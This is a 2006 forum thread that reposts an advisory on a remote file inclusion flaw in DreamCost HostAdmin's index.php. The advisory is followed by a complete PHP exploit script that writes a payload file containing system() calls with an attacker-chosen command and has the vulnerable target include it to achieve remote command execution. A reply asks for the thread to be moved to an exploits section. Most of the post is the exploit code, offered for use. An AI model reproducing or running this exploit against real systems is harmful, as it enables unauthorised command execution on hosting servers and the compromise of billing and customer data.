DS Posted July 1, 2006 Report Posted July 1, 2006 =======================================================================================HostAdmin - Remote Command Execution Vulnerability=======================================================================================http://www.xorcrew.net/http://www.xorcrew.net/ReZEN=======================================================================================:: Summary Vendor : DreamCost Vendor Site : http://www.dreamcost.com/ Product(s) : HostAdmin - Automated Hosting Suite Version(s) : All Severity : Medium/High Impact : Remote Command Execution Release Date : 2/11/2006 Credits : ReZEN (rezen (a) xorcrew (.) net)=======================================================================================I. DescriptionBy creating a product that integrates with the major payment processors, registrars, and provisioning tools on the market, HostAdmin gives your hosting company the power to bill and activate hosting accounts in real-time, even while you sleep at night!=======================================================================================II. SynopsisThere is a remote file inclusion vulnerability that allows for remote command executionin the index.php file. The bug is here on lines 5, 6, and 7: require("setup.php");require("functions.php");require("db.conf");require($path . "que.php");require($path . "provisioning_manager.php");require($path . "registrar_manager.php");the $path variable is not set prior to being used in the require() function.The vendor is no longer offering updates for this software.=======================================================================================Exploit code:-----BEGIN-----<?php/*HostAdmin Remote File Inclusion Exploit c0ded by ReZENSh0uts: xorcrew.net, ajax, gml, #subterrain, My gfurl: http://www.xorcrew.net/ReZEN*/$cmd = $_POST["cmd wrote: ;$turl = $_POST["turl wrote: ;$hurl = $_POST["hurl wrote: ;$form= "<form method="post" action="".$PHP_SELF."">" ."turl:<input type="text" name="turl" size="90" value="".$turl."">" ."hurl:<input type="text" name="hurl" size="90" value="".$hurl."">" ."cmd:<input type="text" name="cmd" size="90" value="".$cmd."">" ."<input type="submit" value="Submit" name="submit">" ."</form><HR WIDTH="650" ALIGN="LEFT">";if (!isset($_POST['submit'])) {echo $form;}else{$file = fopen ("test.txt", "w+");fwrite($file, "<?php system("echo ++BEGIN++"); system("".$cmd.""); system("echo ++END++"); ?>");fclose($file);$file = fopen ($turl.$hurl, "r");if (!$file) { echo "Unable to get output.n"; exit;}echo $form;while (!feof ($file)) { $line .= fgets ($file, 1024).""; }$tpos1 = strpos($line, "++BEGIN++");$tpos2 = strpos($line, "++END++");$tpos1 = $tpos1+strlen("++BEGIN++");$tpos2 = $tpos2-$tpos1;$output = substr($line, $tpos1, $tpos2);echo $output;}?>------END------ Quote
PsYKid Posted July 2, 2006 Report Posted July 2, 2006 Asta trebuie la EXPLOITURI & POC! * un mod sa mute. Quote